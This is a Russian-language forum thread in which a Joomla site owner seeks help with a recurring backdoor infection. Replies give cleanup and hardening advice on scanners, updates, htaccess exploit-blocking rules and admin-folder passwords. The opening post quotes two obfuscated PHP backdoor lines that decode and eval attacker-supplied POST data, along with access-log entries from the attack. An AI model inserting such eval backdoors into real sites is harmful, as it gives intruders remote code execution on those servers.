Вирус в корне сайта - Безопасность сайтов на Joomla

Кто то заливает вирус в корень сайта на Joomla 3.2, такого вида Robots.php - касперский его определяет как backdoor.php.
Этот вирус заливает в папки Joomla различные левые Php файлы с кодом примерно такими:
$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['qb8d09c'])){eval(${$s20}['qb8d09c']);}?><?php

$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['na0b0b6'])) {eval($s21(${$s20}['na0b0b6']));}?><?php

Также похожие строчки появились в некоторых своих php файлах Joomla.

Понятия не имею где искать дыру)

в апаче логе нашел такие строчки:

50.62.177.106 - - [20/Sep/2015:13:36:14 +0300] "POST /robots.php HTTP/1.0" 403 1518 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
45.59.31.193 - - [21/Sep/2015:12:08:29 +0300] "POST /robots.php HTTP/1.1" 200 28622 "-" "-"

Хостер отключил опасные функции PHP и включил онлайн антивирус на опасные запросы. Инфицированный сайт ничем не отличается по работе от обычного состояния. Чистил сайт но потом опять заражение повторилось.

Где копать?) плагины вроде все по удалял ненужные.

А обновить Joomla до 3.4.х ?

Попробуйте http://yandex.ru/promo/manul

А вот тема с аналогичным вирусом и решением http://searchengines.guru/showthread.php?t=879811

Проверил манулом, зараженных вообще не нашел, только подозрительных файлов насчитал очень много))

Самое актуальное сканировать айболитом, а дальше комплексные меры по устранению и предотвращению, зная хостеров, по опыту работы... они мало что понимают какие именно отключать функции надо и для чего вообще это делается.

Вообще я делала так, качала все файлы сайта .т.е. всю папку www на комп, по коду находила в каких файлах сидит, чистила ручками, удаляла все появившиеся папки и файлы вирусы и нормально, сайт здоров.

удалял все зараженые файлы чистил потом опять гляжу в корне залит robots.php,  и опять файлы инфицировались

Вообще я делала так, качала все файлы сайта .т.е. всю папку www на комп, по коду находила в каких файлах сидит, чистила ручками, удаляла все появившиеся папки и файлы вирусы и нормально, сайт здоров.

А как решали вопрос с корнем проблемы?

удалял все зараженые файлы чистил потом опять гляжу в корне залит robots.php,  и опять файлы инфицировались

В соседних темах достаточно рекомендаций, чтоб самостоятельно устранить проблему, если есть конечно опыт в программирование, если нет, то вам без специалиста не обойтись.

Ну значит что то пропустили. После удаления всего, повторного заражения не может быть.

Для начала рекомендую посмотреть тут информацию и полистать список уязвимых приложений https://docs.joomla.org/Category:Security_Checklist/ru

Воспользоваться инструментом https://support.google.com/webmasters/answer/6066468?vid=1-635785918471659665-4262239763&rd=2

А как решали вопрос с корнем проблемы?
В соседних темах достаточно рекомендаций, чтоб самостоятельно устранить проблему, если есть конечно опыт в программирование, если нет, то вам без специалиста не обойтись.

Проблемы у всех почти разные. В моём случае  заражено было 749 файлов.
Везде в ручную удаляла вредоносный код, удаляла подозрительные файлы. У меня были заражены .js
не помню точно мои пошаговые действия, но сделала я всё правильно, Яндекс после перепроверки прислал положительный ответ, сайт здоров.
 
Для сканирования пробовала сервис: http://antivirus-alarm.ru/  -  выводится  путь до всех  вирусных файлов.

Кстати подозревала дырки в widjetkit

И опять же, поработал по ftp, удалил доступ, нужно опять поработать, создал/удалил

Удалять ftp при lfi rfi бесполезно )

local file inclusion
remote file inclusion

А еще много что интересного есть )

Айболит рулит конечно пока что только. Ну и компонент securitycheck очевидные уязвимости показывает.

В любом случае, ftp просто так не должен висеть, пароли нужно постоянно менять либо создавать доступ при необходимости.

удалял все зараженые файлы чистил потом опять гляжу в корне залит robots.php,  и опять файлы инфицировались

Удаляли вы, скорее всего, последствия работы программы, а не сам код, создающий этот файл. Для того, что бы его обнаружить, ваших знаний явно недостаточно. Проверьте айболитом в режиме ssh, он много чего находит. Сервис от Яндекса, на мой взгляд, сыроват. Далее - обновите движок и все компоненты. Часто взлом происходит именно через компонент - в самой Joomla дырок почти нет. Ну и напоследок - вспомните, ставили на сайт что нибудь с варезника? Последний вариант - если денег нет на специалиста, а у вас опять проблемы - удалите вообще все файлы с хостинга, поменяйте все пароли, залейте новую Joomla, скачанную с Joomla.org и переносите данные со старого сайта, предварительно проверяя их (тексты останутся в базе данных, перенести останется папки с картинками и шаблон). А вот шаблон (а обычно в нем и размещают бэкдор) стоит проверить особо тщательно.

В очередной раз почистил по удалял лишние плагины и компоненты, попробую проверить айболитом, если будет опять заражение то поставлю новую Joomla и новый шаблон и подключу базу старую если получиться))
 ФТП у меня отключен в настройках джумлы и на хосте не создан аккаунт
 http://antivirus-alarm.ru/   этот сервис не находит ничего)

Проверил айболитом, нашел много ложного по сути, и шифрованные данные base64 ----->

например (!$status){if($customURL=$this->input->get('returnurl','','string')){$customURL= base64_decode($customURL);}$url=!empty($customURL)? $customURL : 'index.php?op

или

…plate();}if($this->template){$input=JFactory::getApplication()->input;$fileName= base64_decode($input->get('file'));$client=JApplicationHelper::getClientInfo($t

На .htaccess чето ругается.

Кто разбирается в нем??)) есть какие то нарушения?


## Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

## Mod_rewrite in use.

RewriteEngine On

## Begin - Rewrite rules to block out some common exploits.
# If you experience problems on your site block out the operations listed below
# This attempts to block the most common type of exploit `attempts` to Joomla!
#
# Block out any script trying to base64_encode data within the URL.
RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]
# Block out any script that includes a <script> tag in URL.
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL.
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL.
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Return 403 Forbidden header and show the content of the root homepage
RewriteRule .* index.php [F]
#
## End - Rewrite rules to block out some common exploits.

## Begin - Custom redirects
#
# If you need to redirect some pages, or set a canonical non-www to
# www redirect (or vice versa), place that code here. Ensure those
# redirects use the correct RewriteRule syntax and the [R=301,L] flags.
#
## End - Custom redirects

##
# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update Your Joomla! Directory (just / for root).
##

# RewriteBase /

## Begin - Joomla! core SEF Section.
#
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
#
# If the requested path and file is not /index.php and the request
# has not already been internally rewritten to the index.php script
RewriteCond %{REQUEST_URI} !^/index\.php
# and the request is for something within the component folder,
# or for the site root, or for an extensionless URL, or the
# requested URL ends with one of the listed extensions
RewriteCond %{REQUEST_URI} /component/|(/[^.]*|\.(php|html?|feed|pdf|vcf|raw))$ [NC]
# and the requested path and file doesn't directly match a physical file
RewriteCond %{REQUEST_FILENAME} !-f
# and the requested path and file doesn't directly match a physical folder
RewriteCond %{REQUEST_FILENAME} !-d
# internally rewrite the request to the index.php script
RewriteRule .* index.php [L]
#

Ну, наверное вот на эту строчку ругается:

так как там есть base64 ))

что значат эти строчки из апаче лога?

65.193.86.2 - - [23/Sep/2015:06:15:28 +0300] "POST /administrator/index.php HTTP/1.0" 303 282 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
65.193.86.2 - - [23/Sep/2015:06:15:29 +0300] "GET /administrator/index.php HTTP/1.0" 200 7281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
65.193.86.2 - - [23/Sep/2015:06:15:29 +0300] "GET /administrator/index.php HTTP/1.1" 200 7064 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"

IP подозрительные из США. думаеться это от тудова идет залив вируса в корень сайта

по поводу .htacsses надо что то там править или все норм?

что значат эти строчки из апаче лога?

65.193.86.2 - - [23/Sep/2015:06:15:28 +0300] "POST /administrator/index.php HTTP/1.0" 303 282 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
65.193.86.2 - - [23/Sep/2015:06:15:29 +0300] "GET /administrator/index.php HTTP/1.0" 200 7281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
65.193.86.2 - - [23/Sep/2015:06:15:29 +0300] "GET /administrator/index.php HTTP/1.1" 200 7064 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"

IP подозрительные из США. думаеться это от тудова идет залив вируса в корень сайта

по поводу .htacsses надо что то там править или все норм?

htaccess вроде обычный стандартный.. в логах видно что свободно заходят в админку. я бы заблочил этот айпишник через htaccess + сменить логин/пароль на админку + запаролить папку админки с помощью htaccess. пароли естественно нормальные должны быть. ну и зачистить всякие левые и измененные файлы само собой.

Такс, поставил пароль на папку администратор на хостинге, теперь при входе в админку нужно ввести пароль дополнительный.
Сменил логин и пароль от админки
Добавил такие строчки в htaccess:

<Limit GET POST>
order allow,deny
deny from 65.193.86.2
deny from 72.81.248.66
allow from all
</Limit>
это должно заблокировать эти IP?

Что еще можно предпринять?)

это должно заблокировать эти IP?
Что еще можно предпринять?)

Не вижу смысла блокировать IP, так как маршрутизацию легко подделать. Например, подключившись через прокси или банально через ТОР. Заблокируете один адрес - зайдут с другого. И что, все прокси-сервера переписывать? Тогда уж раздобудьте списки серверов и заранее забейте. Всего то несколько миллионов строк в .htaccess... ))

Что еще сделать... Можете добавить плагин скрытия админки, наподобие JSecure Lite. Так вы усложните брут пароля и отбросите множество программ, которые сканируют именно админку. А так же прописать в htaccess запрет на определенные урлы, запрет на папки и т.д. Где то тут выкладывали FAQ по настройке. Ну и еще раз пройтись по всем компонентам-модулям, убедиться, что все скачано с официальных достоверных источников и имеет последнюю версию.

А адрес админки нельзя сменить? Я вот на IPB движке так делаю, постоянно ломятся туда. На Joomla не пробовала.

Было бы ещё полезно, сделать вход в админку с одноразовым кодом, который приходит по SMS.

Базовую авторизацию на админку ставьте.

Поставить плагин Marco's SQL Injection - отсылает письма с логом атаки.
http://joomlaforum.ru/index.php/topic,195980.0.html

А адрес админки нельзя сменить?

Есть два способа - авторизация через htpassword или (и) плагин скрытия, например, JSequre (Lite версия бесплатна). В первом случае будет запрашивать дополнительный пароль, во втором - выкидывать на главную или на специальную страницу. Можно и сменить адрес, но для этого придется лезть в ядро.

А я просто поставил пароль на папку administrator с помощью средств хостинга, и теперь при попытке входа в админку Joomla, вылазите дополнительная форма автоизации) такой метод надежен?) или хакер может сбросить его?

нашел такое в инете:

## Начало - Запрет на выполнение php-скриптов в корне сайта
<Filesmatch ".(php)$">
order deny,allow
deny from all
</Filesmatch>
<Filesmatch "^index.php">
order allow,deny
allow from all
</Filesmatch>
<Filesmatch "^index2.php">
order deny,allow
allow from all
</Filesmatch>
## Конец - Запрет на выполнение php-скриптов в корне сайта

посколько заливают в корнеь сайта php файл, то это сможет его заблокировать?

если я получу доступ к корню, мне плевать на эти разрешения. Если я обнаружу, что залитый мной php не выполняется, я могу залить перловый скрипт или скачать index.php (либо взять из дистрибутива), дописать в него что нужно и залить обратно. Не занимайтесь ерундой.

Инфицирование вроде прекратилось, но происходят такие запросы в логе

94.23.77.182 - - [27/Sep/2015:03:41:49 +0300] "POST /media/dhl/info.php HTTP/1.1" 404 1740 "-" "Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.10"

что он означает? Попытку залить файл, но не удачно??

значит не прекратилось.таких в медиа запросов не может быть